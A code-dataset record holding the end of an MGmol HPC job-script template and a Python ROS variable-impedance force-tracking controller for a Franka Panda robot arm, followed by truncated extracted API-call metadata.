use boost-nompi-1.55.0 export BOOST_ROOT=/usr/local/tools/boost-nompi-1.55.0 export Boost_NO_SYSTEM_PATHS=ON setenv OMP_NUM_THREADS {omp_num_threads} set ntasks = {ntasks} set maindir = $home/mgmol set exe = $maindir/bin/{exe} set datadir = `pwd` set scratchdir = {scratch_path}`basename $datadir` mkdir $scratchdir cd $scratchdir echo ' ' > running set cfg_md = mgmol_md.cfg cp $datadir/$cfg_md . #restart rm -f wave.out set restart_file=`ls -ld * | awk '/snapshot0/ {{ print $9 }}' | tail -n1` ln -s -f $restart_file wave.out #MD run srun -n $ntasks -c {cores_per_task} $exe -c $cfg_md #restart rm -f wave.out set restart_file=`ls -ld * | awk '/snapshot0/ {{ print $9 }}' | tail -n1` ln -s -f $restart_file wave.out rm -f running echo ' ' > queued """
[]
martihmy/Compliant_control
Compliant_control/Force Tracking/archive/VIC_Huang1992_(main 09.03).py
485f627fa83d59f414f41bd57c5d37528ef5f1ec
#! /usr/bin/env python import copy from copy import deepcopy import rospy import threading import quaternion import numpy as np from geometry_msgs.msg import Point from visualization_msgs.msg import * from franka_interface import ArmInterface from panda_robot import PandaArm import matplotlib.pyplot as plt from scipy.spatial.transform import Rotation np.set_printoptions(precision=2) """ This is a FORCE-BASED VARIABLE IMPEDANCE CONTROLLER based on [Huang1992: Compliant Motion Control of Robots by Using Variable Impedance] To achieve force tracking, the apparent stiffness (K) and damping (B) is dynamically adjusted through functions dependent on the error in position, velocity and force About the code/controller: 1] Only stiffness and damping in the 'z'-direction is adaptive, the rest are static 2] Due to the faulted joint velocities (read from rostopics), the more noisy, numerically derived derivatives of the joint position are prefered to be used in the controller { get_x_dot(..., numerically = True) } 3] You can now choose between perform_torque_Huang1992() and perform_torque_DeSchutter() - DeSchutter's control-law offers geometrically consitent stiffness and is more computationally expensive 4] The default desired motion- and force-trajectories are now made in a time-consistent matter, so that the PUBLISH RATE can be altered without messing up the desired behaviour. The number of iterations is calculated as a function of the controller's control-cycle, T: (max_num_it = duration(=15 s) / T) """ # --------- Constants ----------------------------- #print(robot.joint_ordered_angles()) #Read the robot's joint-angles #new_start = {'panda_joint1': 1.938963389436404, 'panda_joint2': 0.6757504724282993, 'panda_joint3': -0.43399745125475564, 'panda_joint4': -2.0375275954865573, 'panda_joint5': -0.05233040021194351, 'panda_joint6': 3.133254153457202, 'panda_joint7': 1.283328743909796} # Stiffness Kp = 30 Kpz = 30 #initial value (adaptive) Ko = 900 K = np.array([[Kp, 0, 0, 0, 0, 0], [0, Kp, 0, 0, 0, 0], [0, 0, Kpz, 0, 0, 0], [0, 0, 0, Ko, 0, 0], [0, 0, 0, 0, Ko, 0], [0, 0, 0, 0, 0, Ko]]) # Damping Bp = Kp/7 Bpz = Bp # #initial value (adaptive) Bo = 50 B = np.array([[Bp, 0, 0, 0, 0, 0], [0, Bp, 0, 0, 0, 0], [0, 0, Bpz, 0, 0, 0], [0, 0, 0, Bo, 0, 0], [0, 0, 0, 0, Bo, 0], [0, 0, 0, 0, 0, Bo]]) # Apparent inertia Mp = 10 Mo = 10 M_diag = np.array([Mp,Mp,Mp,Mo,Mo,Mo]) M = np.diagflat(M_diag) # Constant matrices appearing in equation (50) of [Huang1992] K_v = np.identity(6) P = np.identity(6) gamma = np.identity(18) #gamma_M = 12 gamma_B = 0.001 #2 # The damping's rate of adaptivity (high value = slow changes) gamma_K = 0.0005 #1 # The stiffness' rate of adaptivity (high value = slow changes) #gamma[2,2] = gamma_M gamma[8,8] = gamma_B gamma[14,14] = gamma_K duration = 15 #seconds SHOULD NOT BE ALTERED """Functions for generating desired MOTION trajectories""" #1 Generate a desired trajectory for the manipulator to follow def generate_desired_trajectory(iterations,T): a = np.zeros((6,iterations)) v = np.zeros((6,iterations)) p = np.zeros((3,iterations)) p[:,0] = get_p() if iterations > 300: a[2,0:100]=-0.00001/T**2 a[2,250:350]=0.00001/T**2 if iterations > 6500: a[0,4500:4510]=0.00001/T**2 a[0,6490:6500]=-0.00001/T**2 for i in range(max_num_it): if i>0: v[:,i]=v[:,i-1]+a[:,i-1]*T p[:,i]=p[:,i-1]+v[:3,i-1]*T return a,v,p #2 Generate a desired trajectory for the manipulator to follow def generate_desired_trajectory_express(iterations,T): a = np.zeros((6,iterations)) v = np.zeros((6,iterations)) p = np.zeros((3,iterations)) p[:,0] = get_p() if iterations > 175: a[2,0:50]=-0.00002/T**2 a[2,125:175]=0.00002/T**2 if iterations > 3250: a[0,2250:2255]=0.00002/T**2 a[0,3245:3250]=-0.00002/T**2 for i in range(max_num_it): if i>0: v[:,i]=v[:,i-1]+a[:,i-1]*T p[:,i]=p[:,i-1]+v[:3,i-1]*T return a,v,p #3 Generate a (time-consistent) desired motion trajectory def generate_desired_trajectory_tc(iterations,T,move_in_x=False): a = np.zeros((6,iterations)) v = np.zeros((6,iterations)) p = np.zeros((3,iterations)) p[:,0] = get_p() a[2,0:int(iterations/75)]=-1.25 a[2,int(iterations*2/75):int(iterations/25)]= 1.25 if move_in_x: a[0,int(iterations*3/5):int(iterations*451/750)]=1.25 a[0,int(iterations*649/750):int(iterations*13/15)]=-1.25 for i in range(max_num_it): if i>0: v[:,i]=v[:,i-1]+a[:,i-1]*T p[:,i]=p[:,i-1]+v[:3,i-1]*T return a,v,p """Functions for generating desired FORCE trajectories""" #1 Generate a desired force trajectory def generate_F_d(max_num_it,T): a = np.zeros((6,max_num_it)) v = np.zeros((6,max_num_it)) s = np.zeros((6,max_num_it)) a[2,0:100] = 0.0005/T**2 a[2,100:200] = - 0.0005/T**2 if max_num_it > 1100: a[2,500:550] = 0.0002/T**2 if max_num_it >4001: a[2,1500:1550]=-0.0002/T**2 it = 2000 while it <= 4000: a[2,it]= (-9*(np.pi**2)*(T/4)**2*np.sin(it*T/4*2*np.pi+np.pi/2))/T**2 it+=1 a[2,4001]=0.0001/T**2 for i in range(max_num_it): if i>0: v[2,i]=v[2,i-1]+a[2,i-1]*T s[2,i]=s[2,i-1]+v[2,i-1]*T return s #2 Generate an efficient desired force trajectory def generate_F_d_express(max_num_it,T): a = np.zeros((6,max_num_it)) v = np.zeros((6,max_num_it)) s = np.zeros((6,max_num_it)) a[2,0:50] = 0.0010/T**2 a[2,100:150] = - 0.0010/T**2 if max_num_it > 275: a[2,250:275] = 0.0008/T**2 if max_num_it >2001: a[2,750:775]=-0.0008/T**2 it = 1000 while it <= 2000: a[2,it]= (-9*(np.pi**2)*(T/4)**2*np.sin(2*it*T/4*2*np.pi+np.pi/2))/T**2 it+=1 a[2,2001]=0.0001/T**2 for i in range(max_num_it): if i>0: v[2,i]=v[2,i-1]+a[2,i-1]*T s[2,i]=s[2,i-1]+v[2,i-1]*T return s #3 Generate a (time-consistent) desired force trajectory def generate_F_d_tc(max_num_it,T): a = np.zeros((6,max_num_it)) v = np.zeros((6,max_num_it)) s = np.zeros((6,max_num_it)) a[2,0:int(max_num_it/75)] = 62.5 a[2,int(max_num_it/37.5):int(max_num_it/25)] = - 62.5 if max_num_it > 275: a[2,int(max_num_it/15):int(max_num_it*11/150)] = 50 if max_num_it >2001: a[2,int(max_num_it/5):int(max_num_it*31/150)]=-50 it = int(max_num_it*4/15) while it <= int(max_num_it*8/15): a[2,it]= (-9*(np.pi**2)*(T/4)**2*np.sin(2*it*T/4*2*np.pi+np.pi/2))/T**2 it+=1 a[2,int(max_num_it*8/15+1)]=6.25 for i in range(max_num_it): if i>0: v[2,i]=v[2,i-1]+a[2,i-1]*T s[2,i]=s[2,i-1]+v[2,i-1]*T return s # ------------ Helper functions -------------------------------- # Calculate the numerical derivative of a each row in a vector def get_derivative_of_vector(history,iteration,T): size = history.shape[0] if iteration > 0: return np.subtract(history[:,iteration],history[:,iteration-1])/T else: return np.zeros(size) # Saturation-function def ensure_limits(lower,upper,matrix): for i in range(6): if matrix[i,i] > upper: matrix[i,i] = upper elif matrix[i,i] < lower: matrix[i,i] = lower # Return the cartesian (task-space) inertia of the manipulator [alternatively the inverse of it] def get_W(inv = False): W = np.linalg.multi_dot([robot.jacobian(),np.linalg.inv(robot.joint_inertia_matrix()),robot.jacobian().T]) if inv == True: return np.linalg.inv(W) else: return W # Return the external forces (everything except for z-force is set to 0 due to offsets) def get_F_ext(two_dim = False): if two_dim == True: return np.array([0,0,robot.endpoint_effort()['force'][2],0,0,0]).reshape([6,1]) else: return np.array([0,0,robot.endpoint_effort()['force'][2],0,0,0]) # Return the position and (relative) orientation def get_x(goal_ori): pos_x = robot.endpoint_pose()['position'] rel_ori = quatdiff_in_euler_radians(goal_ori, np.asarray(robot.endpoint_pose()['orientation'])) return np.append(pos_x,rel_ori) # Return the linear and angular velocities # Numerically = True -> return the derivarive of the state-vector # Numerically = False -> read values from rostopic (faulty in sim when interacting with the environment) def get_x_dot(x_hist,i,T, numerically=False): if numerically == True: return get_derivative_of_vector(x_hist,i,T) else: return np.append(robot.endpoint_velocity()['linear'],robot.endpoint_velocity()['angular']) # Return the error in position and orientation def get_delta_x(goal_ori, p_d, two_dim = False): delta_pos = p_d - robot.endpoint_pose()['position'] delta_ori = quatdiff_in_euler_radians(np.asarray(robot.endpoint_pose()['orientation']), goal_ori) if two_dim == True: return np.array([np.append(delta_pos,delta_ori)]).reshape([6,1]) else: return np.append(delta_pos,delta_ori) # Return the error in linear and angular velocities def get_x_dot_delta(x_d_dot,x_dot, two_dim = True): if two_dim == True: return (x_d_dot - x_dot).reshape([6,1]) else: return x_d_dot - x_dot # Return the error in linear and angular acceleration def get_x_ddot_delta(x_d_ddot,v_history,i,T): a = get_derivative_of_vector(v_history,i,T) return x_d_ddot-a # Return the cartesian (task-space) position def get_p(two_dim=False): if two_dim == True: return robot.endpoint_pose()['position'].reshape([3,1]) else: return robot.endpoint_pose()['position'] # Compute difference between quaternions and return Euler angle in radians as difference def quatdiff_in_euler_radians(quat_curr, quat_des): curr_mat = quaternion.as_rotation_matrix(quat_curr) des_mat = quaternion.as_rotation_matrix(quat_des) rel_mat = des_mat.T.dot(curr_mat) rel_quat = quaternion.from_rotation_matrix(rel_mat) vec = quaternion.as_float_array(rel_quat)[1:] if rel_quat.w < 0.0: vec = -vec return -des_mat.dot(vec) # -------------- Main functions -------------------- # Get xi as it is described in equation (44) in [Huang1992] def get_xi(goal_ori, p_d, x_dot, x_d_dot, x_d_ddot, v_history, i, T): E = -get_delta_x(goal_ori, p_d) E_dot = -get_x_dot_delta(x_d_dot,x_dot, two_dim = False) E_ddot = -get_x_ddot_delta(x_d_ddot,v_history,i,T) E_diag = np.diagflat(E) E_dot_diag = np.diagflat(E_dot) E_ddot_diag = np.diagflat(E_ddot) return np.block([E_ddot_diag,E_dot_diag,E_diag]) # Calculate lambda_dot as in equation (50) in [Huang1992] def get_lambda_dot(gamma,xi,K_v,P,F_d): return np.linalg.multi_dot([-np.linalg.inv(gamma),xi.T,np.linalg.inv(K_v),P,get_F_ext(two_dim=True)-F_d.reshape([6,1])]) # Return the updated (adapted) Inertia, Damping and Stiffness matrices. def update_MBK_hat(lam,M,B,K): M_hat = M # + np.diagflat(lam[0:6]) M is chosen to be constant B_hat = B + np.diagflat(lam[6:12]) K_hat = K + np.diagflat(lam[12:18]) #ensure_limits(1,5000,M_hat) ensure_limits(1,5000,B_hat) ensure_limits(1,5000,K_hat) return M_hat, B_hat, K_hat # Calculate and perform the torque as in equation (10) in [Huang1992] def perform_torque_Huang1992(M, B, K, x_d_ddot, x_d_dot,x_dot, p_d, goal_ori): a = np.linalg.multi_dot([robot.jacobian().T,get_W(inv=True),np.linalg.inv(M)]) b = np.array([np.dot(M,x_d_ddot)]).reshape([6,1]) + np.array([np.dot(B,get_x_dot_delta(x_d_dot,x_dot))]).reshape([6,1]) + np.array([np.dot(K,get_delta_x(goal_ori,p_d,two_dim = True))]).reshape([6,1]) c = robot.coriolis_comp().reshape([7,1]) d = (np.identity(6)-np.dot(get_W(inv=True),np.linalg.inv(M))).reshape([6,6]) total_torque = np.array([np.dot(a,b)]).reshape([7,1]) + c + np.array([np.linalg.multi_dot([robot.jacobian().T,d,get_F_ext()])]).reshape([7,1]) robot.set_joint_torques(dict(list(zip(robot.joint_names(),total_torque)))) """ TESTING AREA (Functions needed to run an adaptive version of DeSchutter's impedance controller) [with geometrically consistent stiffness] """ def skew(vector): return np.array([[0, -vector[2], vector[1]], [vector[2], 0, -vector[0]], [-vector[1], vector[0], 0]]) def from_three_to_six_dim(matrix): return np.block([[matrix,np.zeros((3,3))],[np.zeros((3,3)),matrix]]) def get_K_Pt_dot(R_d,K_pt,R_e): return np.array([0.5*np.linalg.multi_dot([R_d,K_pt,R_d.T])+0.5*np.linalg.multi_dot([R_e,K_pt,R_e.T])]) def get_K_Pt_ddot(p_d,R_d,K_pt): return np.array([0.5*np.linalg.multi_dot([skew(p_d-robot.endpoint_pose()['position']),R_d,K_pt,R_d.T])]) def E_quat(quat_n,quat_e): return np.dot(quat_n,np.identity(3))-skew(quat_e) def get_K_Po_dot(quat_n,quat_e,R_e,K_po): return np.array([2*np.linalg.multi_dot([E_quat(quat_n,quat_e).T,R_e,K_po,R_e.T])]) def get_h_delta(K_pt_dot,K_pt_ddot,p_delta,K_po_dot,quat_e): f_delta_t = np.array([np.dot(K_pt_dot,p_delta)]) m_delta_t = np.array([np.dot(K_pt_ddot,p_delta)]) null = np.zeros((3,1)) m_delta_o = np.array([np.dot(K_po_dot,quat_e)]) return np.array([np.append(f_delta_t.T,m_delta_t.T)]).T + np.array([np.append(null.T,m_delta_o.T)]).T def perform_torque_DeSchutter(M, B, K, x_d_ddot, x_d_dot,x_dot, p_d, Rot_d): # must include Rot_d J = robot.jacobian() Rot_e = robot.endpoint_pose()['orientation_R'] Rot_e_bigdim = from_three_to_six_dim(Rot_e) Rot_e_dot = np.dot(skew(robot.endpoint_velocity()['angular']),Rot_e) #not a 100 % sure about this one Rot_e_dot_bigdim = from_three_to_six_dim(Rot_e_dot) quat = quaternion.from_rotation_matrix(np.dot(Rot_e.T,Rot_d)) #orientational displacement represented as a unit quaternion #quat = robot.endpoint_pose()['orientation'] quat_e_e = np.array([quat.x,quat.y,quat.z]) # vector part of the unit quaternion in the frame of the end effector quat_e = np.dot(Rot_e.T,quat_e_e) # ... in the base frame quat_n = quat.w p_delta = p_d-robot.endpoint_pose()['position'] K_Pt_dot = get_K_Pt_dot(Rot_d,K[:3,:3],Rot_e) K_Pt_ddot = get_K_Pt_ddot(p_d,Rot_d,K[:3,:3]) K_Po_dot = get_K_Po_dot(quat_n,quat_e,Rot_e,K[3:,3:]) h_delta_e = np.array(np.dot(Rot_e_bigdim,get_h_delta(K_Pt_dot,K_Pt_ddot,p_delta,K_Po_dot,quat_e))).reshape([6,1]) h_e = get_F_ext(two_dim=True) h_e_e = np.array(np.dot(Rot_e_bigdim,h_e)) a_d_e = np.dot(Rot_e_bigdim,x_d_ddot).reshape([6,1]) v_d_e = np.dot(Rot_e_bigdim,x_d_dot).reshape([6,1]) alpha_e = a_d_e + np.dot(np.linalg.inv(M),(np.dot(B,v_d_e.reshape([6,1])-np.dot(Rot_e_bigdim,x_dot).reshape([6,1]))+h_delta_e-h_e_e)).reshape([6,1]) alpha = np.dot(Rot_e_bigdim.T,alpha_e).reshape([6,1])+np.dot(Rot_e_dot_bigdim.T,np.dot(Rot_e_bigdim,x_dot)).reshape([6,1]) torque = np.linalg.multi_dot([J.T,get_W(inv=True),alpha]).reshape((7,1)) + np.array(robot.coriolis_comp().reshape((7,1))) + np.dot(J.T,h_e).reshape((7,1)) robot.set_joint_torques(dict(list(zip(robot.joint_names(),torque)))) """ TESTING AREA """ # -------------- Plotting ------------------------ def plot_result(v_num, v,p,p_d, delta_x, F_ext,F_d, z_dynamics,M,B,K, T): time_array = np.arange(len(p[0]))*T plt.subplot(211) plt.title("External force") plt.plot(time_array, F_ext[2], label="force z [N]") plt.plot(time_array, F_d[2], label="desired force z [N]", color='b',linestyle='dashed') plt.xlabel("Real time [s]") plt.legend() plt.subplot(212) plt.title("Position") plt.plot(time_array, p[0,:], label = "true x [m]") plt.plot(time_array, p[1,:], label = "true y [m]") plt.plot(time_array, p[2,:], label = "true z [m]") plt.plot(time_array, p_d[0,:], label = "desired x [m]", color='b',linestyle='dashed') plt.plot(time_array, p_d[1,:], label = "desired y [m]", color='C1',linestyle='dashed') plt.plot(time_array, p_d[2,:], label = "desired z [m]", color='g',linestyle='dashed') plt.xlabel("Real time [s]") plt.legend() """ plt.subplot(233) plt.title("Orientation error in Euler") plt.plot(time_array, delta_x[3]*(180/np.pi), label = "error Ori_x [degrees]") plt.plot(time_array, delta_x[4]*(180/np.pi), label = "error Ori_y [degrees]") plt.plot(time_array, delta_x[5]*(180/np.pi), label = "error Ori_z [degrees]") plt.xlabel("Real time [s]") plt.legend() plt.subplot(234) plt.title("Adaptive dynamics along the z-axis") plt.plot(time_array, z_dynamics[0], label = "inertia (M_z)") plt.plot(time_array, z_dynamics[1], label = "damping (B_z)") plt.plot(time_array, z_dynamics[2], label = "stiffness (K_z)") plt.axhline(y=M[2][2], label = "initial inertia (M_z)", color='b',linestyle='dashed') plt.axhline(y=B[2][2], label = "initial damping (B_z)", color='C1',linestyle='dashed') plt.axhline(y=K[2][2], label = "initial stiffness (K_z)", color='g',linestyle='dashed') plt.xlabel("Real time [s]") plt.legend() plt.subplot(235) plt.title("velocity read from rostopic") plt.plot(time_array, v[0], label = "vel x") plt.plot(time_array, v[1], label = "vel y") plt.plot(time_array, v[2], label = "vel z") plt.plot(time_array, v[3], label = "ang x") plt.plot(time_array, v[4], label = "ang y") plt.plot(time_array, v[5], label = "ang z") plt.xlabel("Real time [s]") plt.legend() plt.subplot(236) plt.title("numerically calculated velocity") plt.plot(time_array, v_num[0], label = "vel x") plt.plot(time_array, v_num[1], label = "vel y") plt.plot(time_array, v_num[2], label = "vel z") plt.plot(time_array, v_num[3], label = "ang x") plt.plot(time_array, v_num[4], label = "ang y") plt.plot(time_array, v_num[5], label = "ang z") plt.xlabel("Real time [s]") plt.legend() """ plt.show() if __name__ == "__main__": # ---------- Initialization ------------------- rospy.init_node("impedance_control") robot = PandaArm() publish_rate = 250 rate = rospy.Rate(publish_rate) T = 0.001*(1000/publish_rate) max_num_it = int(duration /T) #robot.move_to_joint_positions(new_start) robot.move_to_neutral() # List used to contain data needed for calculation of the torque output lam = np.zeros(18) v_history = np.zeros((6,max_num_it)) # Lists providing data for plotting p_history = np.zeros((3,max_num_it)) v_history_num = np.zeros((6,max_num_it)) x_history = np.zeros((6,max_num_it)) delta_x_history = np.zeros((6,max_num_it)) F_ext_history = np.zeros((6,max_num_it)) z_dynamics_history = np.zeros((3,max_num_it)) # Specify the desired behaviour of the robot x_d_ddot, x_d_dot, p_d = generate_desired_trajectory_tc(max_num_it,T,move_in_x = True) goal_ori = np.asarray(robot.endpoint_pose()['orientation']) # goal orientation = current (initial) orientation [remains the same the entire duration of the run] Rot_d = robot.endpoint_pose()['orientation_R'] # used by the DeSchutter implementation F_d = generate_F_d_tc(max_num_it,T) # ----------- The control loop ----------- for i in range(max_num_it): # update state-lists p_history[:,i] = get_p() x_history[:,i] = get_x(goal_ori) delta_x_history[:,i] = get_delta_x(goal_ori,p_d[:,i]) F_ext_history[:,i] = get_F_ext() x_dot = get_x_dot(x_history,i,T, numerically=False) #chose 'numerically' either 'True' or 'False' v_history_num[:,i] = get_x_dot(x_history,i,T, numerically=True) # only for plotting v_history[:,i] = get_x_dot(x_history,i,T) # for calculating error in acceleration # adapt M,B and K xi = get_xi(goal_ori, p_d[:,i],x_dot, x_d_dot[:,i], x_d_ddot[:,i], v_history, i, T) lam = lam.reshape([18,1]) + get_lambda_dot(gamma,xi,K_v,P,F_d[:,i]).reshape([18,1])*T M_hat,B_hat,K_hat = update_MBK_hat(lam,M,B,K) # Apply the resulting torque to the robot """CHOOSE ONE OF THE TWO CONTROLLERS BELOW""" perform_torque_Huang1992(M_hat, B_hat, K_hat, x_d_ddot[:,i], x_d_dot[:,i],x_dot, p_d[:,i], goal_ori) #perform_torque_DeSchutter(M_hat, B_hat, K_hat, x_d_ddot[:,i], x_d_dot[:,i],x_dot, p_d[:,i], Rot_d) rate.sleep() # plotting and printing z_dynamics_history[0][i]=M_hat[2][2] z_dynamics_history[1][i]=B_hat[2][2] z_dynamics_history[2][i]=K_hat[2][2] # Live printing to screen when the controller is running if i%100 == 0: print(i,'/',max_num_it,' = ',T*i,' [s] ) Force in z: ',F_ext_history[2,i]) print(K_hat[2][2]) print('') #Uncomment the block below to save plotting-data """ np.save('VIC_p_d.npy',p_d) np.save('VIC_p.npy',p_history) np.save('VIC_Fz_d.npy',F_d) np.save('VIC_Fz.npy',F_ext_history[2]) np.save('VIC_delta_x.npy',delta_x_history) #orientation error in radians np.save('VIC_adaptive_gains.npy',z_dynamics_history) """ plot_result(v_history_num,v_history, p_history, p_d, delta_x_history, F_ext_history, F_d, z_dynamics_history,M,B,K, T)
[((14, 0, 14, 32), 'numpy.set_printoptions', 'np.set_printoptions', (), '', True, 'import numpy as np\n'), ((47, 4, 52, 37), 'numpy.array', 'np.array', ({(47, 13, 52, 36): '[[Kp, 0, 0, 0, 0, 0], [0, Kp, 0, 0, 0, 0], [0, 0, Kpz, 0, 0, 0], [0, 0, 0,\n Ko, 0, 0], [0, 0, 0, 0, Ko, 0], [0, 0, 0, 0, 0, Ko]]'}, {}), '([[Kp, 0, 0, 0, 0, 0], [0, Kp, 0, 0, 0, 0], [0, 0, Kpz, 0, 0, 0], [\n 0, 0, 0, Ko, 0, 0], [0, 0, 0, 0, Ko, 0], [0, 0, 0, 0, 0, Ko]])', True, 'import numpy as np\n'), ((58, 4, 63, 37), 'numpy.array', 'np.array', ({(58, 13, 63, 36): '[[Bp, 0, 0, 0, 0, 0], [0, Bp, 0, 0, 0, 0], [0, 0, Bpz, 0, 0, 0], [0, 0, 0,\n Bo, 0, 0], [0, 0, 0, 0, Bo, 0], [0, 0, 0, 0, 0, Bo]]'}, {}), '([[Bp, 0, 0, 0, 0, 0], [0, Bp, 0, 0, 0, 0], [0, 0, Bpz, 0, 0, 0], [\n 0, 0, 0, Bo, 0, 0], [0, 0, 0, 0, Bo, 0], [0, 0, 0, 0, 0, Bo]])', True, 'import numpy as np\n'), ((68, 9, 68, 38), 'numpy.array', 'np.array', ({(68, 18, 68, 37): '[Mp, Mp, Mp, Mo, Mo, Mo]'}, {}), '([Mp, Mp, Mp, Mo, Mo, Mo])', True, 'import numpy as np\n'), ((69, 4, 69, 23), 'numpy.diagflat', 'np.diagflat', ({(69, 16, 69, 22): 'M_diag'}, {}), '(M_diag)', True, 'import numpy as np\n'), ((72, 6, 72, 20), 'numpy.identity', 'np.identity', ({(72, 18, 72, 19): '6'}, {}), '(6)', True, 'import numpy as np\n'), ((73, 4, 73, 18), 'numpy.identity', 'np.identity', ({(73, 16, 73, 17): '6'}, {}), '(6)', True, 'import numpy as np\n'), ((74, 8, 74, 23), 'numpy.identity', 'np.identity', ({(74, 20, 74, 22): '18'}, {}), '(18)', True, 'import numpy as np\n'), ((90, 8, 90, 32), 'numpy.zeros', 'np.zeros', ({(90, 17, 90, 31): '(6, iterations)'}, {}), '((6, iterations))', True, 'import numpy as np\n'), ((91, 8, 91, 32), 'numpy.zeros', 'np.zeros', ({(91, 17, 91, 31): '(6, iterations)'}, {}), '((6, iterations))', True, 'import numpy as np\n'), ((92, 8, 92, 32), 'numpy.zeros', 'np.zeros', ({(92, 17, 92, 31): '(3, iterations)'}, {}), '((3, iterations))', True, 'import numpy as np\n'), ((110, 8, 110, 32), 'numpy.zeros', 'np.zeros', ({(110, 17, 110, 31): '(6, iterations)'}, {}), '((6, iterations))', True, 'import numpy as np\n'), ((111, 8, 111, 32), 'numpy.zeros', 'np.zeros', ({(111, 17, 111, 31): '(6, iterations)'}, {}), '((6, iterations))', True, 'import numpy as np\n'), ((112, 8, 112, 32), 'numpy.zeros', 'np.zeros', ({(112, 17, 112, 31): '(3, iterations)'}, {}), '((3, iterations))', True, 'import numpy as np\n'), ((130, 8, 130, 32), 'numpy.zeros', 'np.zeros', ({(130, 17, 130, 31): '(6, iterations)'}, {}), '((6, iterations))', True, 'import numpy as np\n'), ((131, 8, 131, 32), 'numpy.zeros', 'np.zeros', ({(131, 17, 131, 31): '(6, iterations)'}, {}), '((6, iterations))', True, 'import numpy as np\n'), ((132, 8, 132, 32), 'numpy.zeros', 'np.zeros', ({(132, 17, 132, 31): '(3, iterations)'}, {}), '((3, iterations))', True, 'import numpy as np\n'), ((152, 8, 152, 32), 'numpy.zeros', 'np.zeros', ({(152, 17, 152, 31): '(6, max_num_it)'}, {}), '((6, max_num_it))', True, 'import numpy as np\n'), ((153, 8, 153, 32), 'numpy.zeros', 'np.zeros', ({(153, 17, 153, 31): '(6, max_num_it)'}, {}), '((6, max_num_it))', True, 'import numpy as np\n'), ((154, 8, 154, 32), 'numpy.zeros', 'np.zeros', ({(154, 17, 154, 31): '(6, max_num_it)'}, {}), '((6, max_num_it))', True, 'import numpy as np\n'), ((177, 8, 177, 32), 'numpy.zeros', 'np.zeros', ({(177, 17, 177, 31): '(6, max_num_it)'}, {}), '((6, max_num_it))', True, 'import numpy as np\n'), ((178, 8, 178, 32), 'numpy.zeros', 'np.zeros', ({(178, 17, 178, 31): '(6, max_num_it)'}, {}), '((6, max_num_it))', True, 'import numpy as np\n'), ((179, 8, 179, 32), 'numpy.zeros', 'np.zeros', ({(179, 17, 179, 31): '(6, max_num_it)'}, {}), '((6, max_num_it))', True, 'import numpy as np\n'), ((202, 8, 202, 32), 'numpy.zeros', 'np.zeros', ({(202, 17, 202, 31): '(6, max_num_it)'}, {}), '((6, max_num_it))', True, 'import numpy as np\n'), ((203, 8, 203, 32), 'numpy.zeros', 'np.zeros', ({(203, 17, 203, 31): '(6, max_num_it)'}, {}), '((6, max_num_it))', True, 'import numpy as np\n'), ((204, 8, 204, 32), 'numpy.zeros', 'np.zeros', ({(204, 17, 204, 31): '(6, max_num_it)'}, {}), '((6, max_num_it))', True, 'import numpy as np\n'), ((268, 11, 268, 35), 'numpy.append', 'np.append', ({(268, 21, 268, 26): 'pos_x', (268, 27, 268, 34): 'rel_ori'}, {}), '(pos_x, rel_ori)', True, 'import numpy as np\n'), ((317, 15, 317, 55), 'quaternion.as_rotation_matrix', 'quaternion.as_rotation_matrix', ({(317, 45, 317, 54): 'quat_curr'}, {}), '(quat_curr)', False, 'import quaternion\n'), ((318, 14, 318, 53), 'quaternion.as_rotation_matrix', 'quaternion.as_rotation_matrix', ({(318, 44, 318, 52): 'quat_des'}, {}), '(quat_des)', False, 'import quaternion\n'), ((320, 15, 320, 55), 'quaternion.from_rotation_matrix', 'quaternion.from_rotation_matrix', ({(320, 47, 320, 54): 'rel_mat'}, {}), '(rel_mat)', False, 'import quaternion\n'), ((333, 13, 333, 27), 'numpy.diagflat', 'np.diagflat', ({(333, 25, 333, 26): 'E'}, {}), '(E)', True, 'import numpy as np\n'), ((334, 17, 334, 35), 'numpy.diagflat', 'np.diagflat', ({(334, 29, 334, 34): 'E_dot'}, {}), '(E_dot)', True, 'import numpy as np\n'), ((335, 18, 335, 37), 'numpy.diagflat', 'np.diagflat', ({(335, 30, 335, 36): 'E_ddot'}, {}), '(E_ddot)', True, 'import numpy as np\n'), ((336, 11, 336, 52), 'numpy.block', 'np.block', ({(336, 20, 336, 51): '[E_ddot_diag, E_dot_diag, E_diag]'}, {}), '([E_ddot_diag, E_dot_diag, E_diag])', True, 'import numpy as np\n'), ((370, 11, 372, 49), 'numpy.array', 'np.array', ({(370, 20, 372, 48): '[[0, -vector[2], vector[1]], [vector[2], 0, -vector[0]], [-vector[1],\n vector[0], 0]]'}, {}), '([[0, -vector[2], vector[1]], [vector[2], 0, -vector[0]], [-vector[\n 1], vector[0], 0]])', True, 'import numpy as np\n'), ((392, 11, 392, 26), 'numpy.zeros', 'np.zeros', ({(392, 20, 392, 25): '(3, 1)'}, {}), '((3, 1))', True, 'import numpy as np\n'), ((407, 15, 407, 47), 'numpy.array', 'np.array', ({(407, 24, 407, 46): '[quat.x, quat.y, quat.z]'}, {}), '([quat.x, quat.y, quat.z])', True, 'import numpy as np\n'), ((408, 13, 408, 37), 'numpy.dot', 'np.dot', ({(408, 20, 408, 27): 'Rot_e.T', (408, 28, 408, 36): 'quat_e_e'}, {}), '(Rot_e.T, quat_e_e)', True, 'import numpy as np\n'), ((437, 4, 437, 20), 'matplotlib.pyplot.subplot', 'plt.subplot', ({(437, 16, 437, 19): '(211)'}, {}), '(211)', True, 'import matplotlib.pyplot as plt\n'), ((438, 4, 438, 31), 'matplotlib.pyplot.title', 'plt.title', ({(438, 14, 438, 30): '"""External force"""'}, {}), "('External force')", True, 'import matplotlib.pyplot as plt\n'), ((439, 4, 439, 55), 'matplotlib.pyplot.plot', 'plt.plot', (), '', True, 'import matplotlib.pyplot as plt\n'), ((440, 4, 440, 91), 'matplotlib.pyplot.plot', 'plt.plot', (), '', True, 'import matplotlib.pyplot as plt\n'), ((441, 4, 441, 31), 'matplotlib.pyplot.xlabel', 'plt.xlabel', ({(441, 15, 441, 30): '"""Real time [s]"""'}, {}), "('Real time [s]')", True, 'import matplotlib.pyplot as plt\n'), ((442, 4, 442, 16), 'matplotlib.pyplot.legend', 'plt.legend', ({}, {}), '()', True, 'import matplotlib.pyplot as plt\n'), ((445, 4, 445, 20), 'matplotlib.pyplot.subplot', 'plt.subplot', ({(445, 16, 445, 19): '(212)'}, {}), '(212)', True, 'import matplotlib.pyplot as plt\n'), ((446, 4, 446, 25), 'matplotlib.pyplot.title', 'plt.title', ({(446, 14, 446, 24): '"""Position"""'}, {}), "('Position')", True, 'import matplotlib.pyplot as plt\n'), ((447, 4, 447, 54), 'matplotlib.pyplot.plot', 